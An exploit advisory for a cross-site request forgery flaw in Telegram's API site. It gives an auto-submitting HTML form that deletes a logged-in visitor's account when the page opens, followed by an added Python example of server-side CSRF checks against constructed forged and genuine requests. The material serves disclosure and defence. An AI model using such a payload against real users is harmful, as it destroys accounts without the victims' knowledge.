/***********************************************************************************
** Exploit Title: Telegram API Cross Site Request Forgery
**
** Exploit Author: C4T
**
** Vendor Homepage : http://my.telegram.org
**
** Google Dork: none
**
** Date: 06/27/2015
**
** Tested on: Windows 7
**
************************************************************************************
** Exploit Code:
******************
<body onload="document.exploit.submit()">
<form name="exploit" action="https://my.telegram.org/deactivate/do_delete" id="deactivate_phone_form" onsubmit="return sendPassword(event);">
<input type="hidden" name="message" value="ExploitedByC4T">
</form>
*************************************************************************************
** Description:
******************
When a user is logged in to the Telegram API, just opening a web page containing this exploit will delete his account.
Discovered by C4T
@ Ashiyane Digital Security Team.
-------------------------------------------------------
******************************************************************************************
**
** More Details and Explanation:
**
** http://hatrhyme.com/CSRFInTelegram.pdf
**
******************************************************************************************
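
Added example (not part of the original advisory and not Telegram's code): a server-side check that would refuse the auto-submitted form shown above, combining a method check, an Origin/Referer check and a session-bound token. The secret key, session id, `csrf_token` field name and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SERVER_KEY = b"constructed-demo-key"        # assumption: per-deployment secret
TRUSTED_ORIGIN = "https://my.telegram.org"  # origin of the form action on this page


def issue_token(session_id: str) -> str:
    """Token bound to one session; the site's own form carries it as a hidden field."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Compare Origin (Referer as fallback) with the site's own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # destructive action: fail closed when both are absent
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def check_delete_request(method: str, headers: dict, session_id: str, form: dict) -> str:
    """Return 'allow' or the reason the state-changing request is refused."""
    if method != "POST":
        return "reject: method"
    if not same_origin(headers):
        return "reject: origin"
    supplied = form.get("csrf_token", "").encode()
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(supplied, expected):
        return "reject: token"
    return "allow"


# Constructed requests. "forged" mirrors the form above: no method attribute
# (so GET), arriving from another site, authenticated only by the session cookie.
SESSION = "constructed-session-id"
forged = ("GET", {"Referer": "https://attacker.example/page.html"},
          SESSION, {"message": "ExploitedByC4T"})
cross_site_post = ("POST", {"Origin": "https://attacker.example"},
                   SESSION, {"message": "ExploitedByC4T"})
genuine = ("POST", {"Origin": TRUSTED_ORIGIN},
           SESSION, {"message": "bye", "csrf_token": issue_token(SESSION)})

if __name__ == "__main__":
    for name, req in [("forged", forged), ("cross_site_post", cross_site_post), ("genuine", genuine)]:
        print(name, "->", check_delete_request(*req))
```

Setting `SameSite=Lax` or `SameSite=Strict` on the session cookie adds a browser-side layer on top of these checks.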